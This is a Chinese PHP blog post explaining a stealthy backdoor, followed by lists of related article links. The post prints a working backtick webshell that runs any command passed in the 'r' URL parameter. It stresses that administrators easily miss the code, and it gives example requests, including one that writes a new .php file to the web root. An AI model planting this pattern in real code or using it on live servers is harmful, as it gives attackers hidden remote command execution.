编程 PHP

一个不易被发现的PHP后门代码解析

Posted in PHP onJuly 05, 2014

偶然间看到一段，看起来似乎没有什么问题，确是能致命的后门代码，这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ，反撇号包含的字符串，等同于shell_exec函数。

伪装性很好，很容易被管理员忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

刚看到这段代码我想大家都会说没有问题，但是细心的朋友也会发现下面的变量被一个符号包起来了，既然是变量为什么要这样了，

而且又不是单引号，这个就是关键所在了，这个符号是 Esc 下面的一个键（位于感叹号！旁边的），

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php

我用 appserv 和虚拟主机已经测试成功。

一个不易被发现的PHP后门代码解析

- Author -

shichen2014

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php访问查询mysql数据的三种方法

Oct 09 PHP

php/js获取客户端mac地址的实现代码

Jul 08 PHP

PHP curl实现抓取302跳转后页面的示例

Jul 04 PHP

linux下编译安装memcached服务

Aug 03 PHP

PHP 5.3和PHP 5.4出现FastCGI Error解决方法

Feb 12 PHP

php跨服务器访问方法小结

May 12 PHP

Yii控制器中filter过滤器用法分析

Jul 15 PHP

yii2缓存Caching基本用法示例

Jul 18 PHP

php运行报错Call to undefined function curl_init()的最新解决方法

Nov 20 PHP

PHP基于socket实现客户端和服务端通讯功能

Jul 13 PHP

PHP两个n位的二进制整数相加问题的解决

Aug 26 PHP

php实现简单的守护进程创建、开启与关闭操作

Aug 13 PHP

linux下使用crontab实现定时PHP计划任务失败的原因分析

Jul 05 #PHP

php操作redis中的hash和zset类型数据的方法和代码例子

Jul 05 #PHP

采用memcache在web集群中实现session的同步会话

Jul 05 #PHP

30个php操作redis常用方法代码例子

Jul 05 #PHP

PHP在网页中动态生成PDF文件详细教程

Jul 05 #PHP

PHP数组遍历知识汇总（包含遍历方法、数组指针操作函数、数组遍历测速）

Jul 05 #PHP

php遍历数组的4种方法总结

Jul 05 #PHP

You might like

《魔兽争霸3》重制版究竟重制了什么？玩家：这么糊弄真的好吗？

2020/05/04 魔兽争霸

探讨PHP函数ip2long转换IP时数值太大产生负数的解决方法

2013/06/06 PHP

thinkphp3.2.3版本的数据库增删改查实现代码

2016/09/22 PHP

jquery 注意事项与常用语法小结

2010/06/07 Javascript

javascript 基础篇3 类，回调函数，内置对象，事件处理

2012/03/14 Javascript

JavaScript数组深拷贝和浅拷贝的两种方法

2014/04/16 Javascript

Javascript 拖拽的一些简单的应用(逐行分析代码，让你轻松了拖拽的原理)

2015/01/23 Javascript

JavaScript字符串常用类使用方法汇总

2015/04/14 Javascript

jQuery 1.9.1源码分析系列（十）事件系统之主动触发事件和模拟冒泡处理

2015/11/24 Javascript

Jquery实现select multiple左右添加和删除功能的简单实例

2016/05/26 Javascript

jQuery四种选择器使用及示例

2016/06/05 Javascript

jQuery和JavaScript节点插入元素的方法对比

2016/11/18 Javascript

浅析JavaScript动画模拟拖拽原理

2016/12/09 Javascript

Angular 4依赖注入学习教程之组件服务注入（二）

2017/06/04 Javascript

vue事件修饰符和按键修饰符用法总结

2017/07/25 Javascript

axios post提交formdata的实例

2018/03/16 Javascript

浅谈angularJs函数的使用方法(大小写转换,拷贝,扩充对象)

2018/10/08 Javascript

vue插件draggable实现拖拽移动图片顺序

2018/12/01 Javascript

Vue中图片Src使用变量的方法

2019/10/30 Javascript

[02:33]2014DOTA2 TI每日综述 LGD涉险晋级DK闯入胜者组

2014/07/14 DOTA

python访问系统环境变量的方法

2015/04/29 Python

Python使用ftplib实现简易FTP客户端的方法

2015/06/03 Python

Java中重定向输出流实现用文件记录程序日志

2015/06/12 Python

Django CBV与FBV原理及实例详解

2019/08/12 Python

Python 实现加密过的PDF文件转WORD格式

2020/02/04 Python

基于python实现获取网页图片过程解析

2020/05/11 Python

新娘父亲婚礼致辞

2014/01/16 职场文书

房地产项目建议书

2014/03/12 职场文书

大四学生找工作的自荐信

2014/03/27 职场文书

学校运动会广播稿100条

2014/09/14 职场文书

司法工作人员群众路线对照检查材料思想汇报

2014/09/30 职场文书

高中教师个人总结

2015/02/10 职场文书

停电放假通知

2015/04/14 职场文书

小学班级口号大全

2015/12/25 职场文书

SQL Server表分区降低运维和维护成本

2022/04/08 SQL Server

如何利用python实现Simhash算法

2022/06/28 Python